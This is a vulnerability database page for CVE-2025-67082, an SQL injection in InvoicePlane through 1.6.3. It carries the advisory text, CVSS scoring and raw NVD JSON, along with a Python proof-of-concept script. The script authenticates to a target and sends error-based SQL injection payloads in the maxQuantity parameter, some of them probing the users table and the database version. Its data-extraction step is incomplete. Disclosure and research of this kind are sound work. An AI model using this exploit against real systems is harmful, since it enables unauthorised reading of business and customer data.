Security Vulnerability Report
CVE-2025-67082 CVSS 6.5 MEDIUM

CVE-2025-67082

Published: 2026-01-15 15:15:51
Last Modified: 2026-01-22 16:04:15

Description

An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:* - VULNERABLE
InvoicePlane < 1.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys

# CVE-2025-67082 PoC - InvoicePlane SQL Injection
# Target: InvoicePlane <= 1.6.3
# Vector: maxQuantity/minQuantity parameters in report generation

TARGET_URL = "http://target-website.com/index.php/reports/generate"
USERNAME = "[email protected]"
PASSWORD = "password123"


def login(session):
    """Authenticate to InvoicePlane"""
    login_url = f"{TARGET_URL.replace('/reports/generate', '/session/login')}"
    data = {
        "email": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=data)
    return "login_success" in response.text or response.status_code == 200


def exploit_sql_injection(session):
    """Execute SQL injection via maxQuantity parameter"""
    # Error-based SQL injection payload to extract database version
    # The single quote breaks the original query, enabling injection
    payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END) AND '1'='1"
    data = {
        "reportType": "inventory",
        "maxQuantity": payload,
        "minQuantity": "0",
        "submit": "Generate"
    }
    try:
        response = session.post(TARGET_URL, data=data, timeout=10)
        if response.status_code == 200:
            # Check for SQL error messages indicating successful injection
            if "Division by 0" in response.text or "SQLSTATE" in response.text:
                print("[+] SQL Injection successful - Error-based extraction possible")
                return True
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def extract_data(session):
    """Extract database information using error-based SQL injection"""
    # Payload to extract database user
    payloads = [
        "1' AND (SELECT COUNT(*) FROM users) > 0 AND '1'='1",
        "1' AND (SELECT SUBSTRING(version(),1,10)) AND '1'='1"
    ]
    for payload in payloads:
        data = {
            "reportType": "inventory",
            "maxQuantity": payload,
            "minQuantity": "0"
        }
        response = session.post(TARGET_URL, data=data)
        # Process response to extract data
        print(f"[*] Payload sent: {payload}")


if __name__ == "__main__":
    session = requests.Session()
    print("[*] Starting CVE-2025-67082 exploitation...")
    if login(session):
        print("[+] Authentication successful")
        if exploit_sql_injection(session):
            print("[+] SQL Injection confirmed")
            extract_data(session)
    else:
        print("[-] Authentication failed")

References

https://github.com/InvoicePlane/InvoicePlane (Product)
https://www.helx.io/blog/advisory-invoice-plane/ (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67082",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-15T15:15:51.213",
    "lastModified": "2026-01-22T16:04:15.340",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in \"maxQuantity\" and \"minQuantity\" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes."},
      {"lang": "es", "value": "Una vulnerabilidad de inyección SQL en InvoicePlane hasta la versión 1.6.3 ha sido identificada en los parámetros 'maxQuantity' y 'minQuantity' al generar un informe. Un atacante autenticado puede explotar este problema mediante inyección SQL basada en errores, permitiendo la extracción de datos arbitrarios de la base de datos. La vulnerabilidad surge de la sanitización insuficiente de las comillas simples."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.6.4",
                "matchCriteriaId": "17C261C3-0A6B-4D07-8370-DD3C71097DE2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/InvoicePlane/InvoicePlane", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://www.helx.io/blog/advisory-invoice-plane/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}